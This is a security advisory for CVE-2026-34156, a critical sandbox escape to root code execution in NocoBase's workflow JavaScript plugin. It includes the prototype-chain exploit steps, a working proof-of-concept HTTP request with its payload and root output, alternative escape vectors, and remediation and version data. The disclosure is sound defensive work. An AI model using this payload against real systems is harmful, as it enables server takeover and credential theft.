GHSA-px3p-vgh9-m57c

Source

https://github.com/advisories/GHSA-px3p-vgh9-m57c

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-px3p-vgh9-m57c/GHSA-px3p-vgh9-m57c.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-px3p-vgh9-m57c

Aliases

CVE-2026-34156

Published

2026-03-30T17:16:24Z

Modified

2026-03-30T17:37:24.447229Z

Severity

9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVSS Calculator

Summary

NocoBase Affected by Sandbox Escape to RCE via console._stdout Prototype Chain Traversal in Workflow Script Node

Details

## Summary

NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr.

An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.

Exploit Chain

console._stdout.constructor.constructor → host-realm Function constructor
Function('return process')() → Node.js process object
process.mainModule.require('child_process') → unrestricted module loading
child_process.execSync('id') → RCE as root

This completely bypasses the customRequire allowlist.

Impact

Remote Code Execution as root (uid=0) inside Docker container
Database credential theft (DB_PASSWORD, INIT_ROOT_PASSWORD from process.env)
Arbitrary file read/write via require('fs')
Reverse shell confirmed
Outbound network access for lateral movement

Proof of Concept

HTTP Request:

POST /api/flow_nodes:test Authorization: Bearer <JWT_TOKEN> Content-Type: application/json

{ "type": "script", "config": { "content": "const Fn=console.stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('childprocess');return cp.execSync('id').toString().trim();", "timeout": 5000, "arguments": [] } }

Response:

{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}

Environment

Docker image: nocobase/nocobase:latest
NocoBase CLI: v2.0.26
Node.js: v20.20.1
OS: Debian GNU/Linux 12 (bookworm)

PoC

Got reverse shell

Proof of concept the root privileges

os-release demonstration

App path

Exploit Usage:

Reverse Shell Mode

Dump system information & creds

Remote Command Execution Mode

Remediation

Replace Node.js vm module with isolated-vm for true V8 isolate separation
Do not pass the host console object into the sandbox; create a clean proxy
Run the application as a non-root user inside Docker
Restrict /api/flow_nodes:test to admin-only roles

Alternative Escape Vectors

console._stderr.constructor.constructor (identical chain via stderr)
Error.prepareStackTrace + CallSite.getThis() (V8 CallSite API)

Reporter

Onurcan Genç — Independent Security Researcher, Bilkent University

Database specific

{
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-913"
    ],
    "nvd_published_at": null,
    "github_reviewed_at": "2026-03-30T17:16:24Z",
    "severity": "CRITICAL"
}

References

Affected packages

npm / @nocobase/plugin-workflow-javascript

Package

Name: @nocobase/plugin-workflow-javascript; View open source insights on deps.dev
Purl: pkg:npm/%40nocobase/plugin-workflow-javascript

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

2.0.28

Database specific

last_known_affected_version_range

"<= 2.0.27"

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-px3p-vgh9-m57c/GHSA-px3p-vgh9-m57c.json"